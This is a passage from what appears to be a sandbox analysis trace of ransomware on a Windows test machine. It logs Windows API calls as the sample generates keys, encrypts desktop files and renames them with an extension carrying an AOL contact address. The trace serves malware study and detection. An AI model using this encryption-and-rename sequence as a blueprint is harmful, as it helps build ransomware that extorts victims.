nNumberOfBytesToRead=0x15348, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0x15348, lpOverlapped=0x0) returned 1 [0160.827] SetFilePointer (in: hFile=0x398, lDistanceToMove=-86856, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.827] WriteFile (in: hFile=0x398, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x15348, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x15348, lpOverlapped=0x0) returned 1 [0160.827] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.827] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0048 | out: hHeap=0x2e0000) returned 1 [0160.827] CloseHandle (hObject=0x398) returned 1 [0160.827] GetProcessHeap () returned 0x2e0000 [0160.827] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.827] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.827] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.827] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a9428 | out: hHeap=0x2e0000) returned 1 [0160.827] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319da8 | out: hHeap=0x2e0000) returned 1 [0160.827] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0160.827] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.827] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.827] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.827] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.827] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eNkZpblszxCN6V.mkv", dwFileAttributes=0x80) returned 1 [0160.828] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eNkZpblszxCN6V.mkv") returned 57 [0160.828] GetProcessHeap () returned 0x2e0000 [0160.828] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x336dd8 [0160.828] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eNkZpblszxCN6V.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eNkZpblszxCN6V.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eNkZpblszxCN6V.mkv" [0160.828] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eNkZpblszxCN6V.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eNkZpblszxCN6V.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eNkZpblszxCN6V.mkv.12781717671972518758.ex_parvis@aol.com.AIR" [0160.828] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eNkZpblszxCN6V.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\enkzpblszxcn6v.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eNkZpblszxCN6V.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\enkzpblszxcn6v.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.831] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eNkZpblszxCN6V.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\enkzpblszxcn6v.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.831] GetProcessHeap () returned 0x2e0000 [0160.831] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0160.831] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=39969) returned 1 [0160.831] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x9c21 [0160.831] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.831] GetProcessHeap () returned 0x2e0000 [0160.831] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.831] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.831] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.832] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.832] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.832] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9c21) returned 0x3aa410 [0160.832] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9c21) returned 0x3b4040 [0160.832] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.832] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0x9c21, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0x9c21, lpOverlapped=0x0) returned 1 [0160.833] SetFilePointer (in: hFile=0x398, lDistanceToMove=-39969, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.833] WriteFile (in: hFile=0x398, lpBuffer=0x3b4040*, nNumberOfBytesToWrite=0x9c21, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b4040*, lpNumberOfBytesWritten=0x2acf9c8*=0x9c21, lpOverlapped=0x0) returned 1 [0160.833] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.834] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2e0000) returned 1 [0160.835] CloseHandle (hObject=0x398) returned 1 [0160.835] GetProcessHeap () returned 0x2e0000 [0160.835] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.835] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.835] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.835] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328e80 | out: hHeap=0x2e0000) returned 1 [0160.835] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328f08 | out: hHeap=0x2e0000) returned 1 [0160.835] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x70) returned 0x3a9428 [0160.835] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.835] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.835] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.835] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.835] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", dwFileAttributes=0x80) returned 1 [0160.836] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 50 [0160.836] GetProcessHeap () returned 0x2e0000 [0160.836] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xca) returned 0x3470a0 [0160.836] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" [0160.836] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0160.836] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.838] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.838] GetProcessHeap () returned 0x2e0000 [0160.838] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0160.838] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=282) returned 1 [0160.838] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x11a [0160.838] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.838] GetProcessHeap () returned 0x2e0000 [0160.838] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.838] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.838] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.839] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.839] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.839] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x11a) returned 0x336dd8 [0160.839] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x11a) returned 0x31fae0 [0160.840] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.840] ReadFile (in: hFile=0x398, lpBuffer=0x336dd8, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesRead=0x2acf9c8*=0x11a, lpOverlapped=0x0) returned 1 [0160.840] SetFilePointer (in: hFile=0x398, lDistanceToMove=-282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.840] WriteFile (in: hFile=0x398, lpBuffer=0x31fae0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesWritten=0x2acf9c8*=0x11a, lpOverlapped=0x0) returned 1 [0160.840] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0160.840] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0160.840] CloseHandle (hObject=0x398) returned 1 [0160.840] GetProcessHeap () returned 0x2e0000 [0160.840] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.840] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.840] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.840] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.840] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.840] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe", dwFileAttributes=0x80) returned 1 [0160.840] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 49 [0160.841] GetProcessHeap () returned 0x2e0000 [0160.841] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc8) returned 0x319d30 [0160.841] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe" [0160.841] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0160.841] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\csrhdp.exe"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\csrhdp.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.843] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\csrhdp.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.844] GetProcessHeap () returned 0x2e0000 [0160.844] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.844] CloseHandle (hObject=0xffffffff) returned 0 [0160.844] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.844] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.844] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cmpw6P2.avi", dwFileAttributes=0x80) returned 1 [0160.844] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cmpw6P2.avi") returned 50 [0160.844] GetProcessHeap () returned 0x2e0000 [0160.844] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xca) returned 0x3470a0 [0160.844] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cmpw6P2.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cmpw6P2.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cmpw6P2.avi" [0160.844] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cmpw6P2.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cmpw6P2.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cmpw6P2.avi.12781717671972518758.ex_parvis@aol.com.AIR" [0160.844] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cmpw6P2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cmpw6p2.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cmpw6P2.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cmpw6p2.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.846] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cmpw6P2.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cmpw6p2.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.846] GetProcessHeap () returned 0x2e0000 [0160.846] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0160.846] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=24688) returned 1 [0160.846] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x6070 [0160.847] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.847] GetProcessHeap () returned 0x2e0000 [0160.847] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.847] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.847] WriteFile (in: hFile=0x398, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.848] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.848] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.848] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6070) returned 0x3ac410 [0160.848] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6070) returned 0x3b2488 [0160.848] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.848] ReadFile (in: hFile=0x398, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x6070, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x6070, lpOverlapped=0x0) returned 1 [0160.848] SetFilePointer (in: hFile=0x398, lDistanceToMove=-24688, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.849] WriteFile (in: hFile=0x398, lpBuffer=0x3b2488*, nNumberOfBytesToWrite=0x6070, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2488*, lpNumberOfBytesWritten=0x2acf9c8*=0x6070, lpOverlapped=0x0) returned 1 [0160.849] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.849] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.849] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\brmFf-QyNVENevBqgwPI.jpg", dwFileAttributes=0x80) returned 1 [0160.849] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\brmFf-QyNVENevBqgwPI.jpg") returned 63 [0160.849] GetProcessHeap () returned 0x2e0000 [0160.849] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3a7428 [0160.849] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\brmFf-QyNVENevBqgwPI.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\brmFf-QyNVENevBqgwPI.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\brmFf-QyNVENevBqgwPI.jpg" [0160.849] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\brmFf-QyNVENevBqgwPI.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\brmFf-QyNVENevBqgwPI.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\brmFf-QyNVENevBqgwPI.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0160.849] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\brmFf-QyNVENevBqgwPI.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\brmff-qynvenevbqgwpi.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\brmFf-QyNVENevBqgwPI.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\brmff-qynvenevbqgwpi.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.852] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\brmFf-QyNVENevBqgwPI.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\brmff-qynvenevbqgwpi.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.852] GetProcessHeap () returned 0x2e0000 [0160.852] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0160.852] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=48339) returned 1 [0160.852] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xbcd3 [0160.852] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.852] GetProcessHeap () returned 0x2e0000 [0160.852] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.852] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.853] WriteFile (in: hFile=0x398, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.853] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, 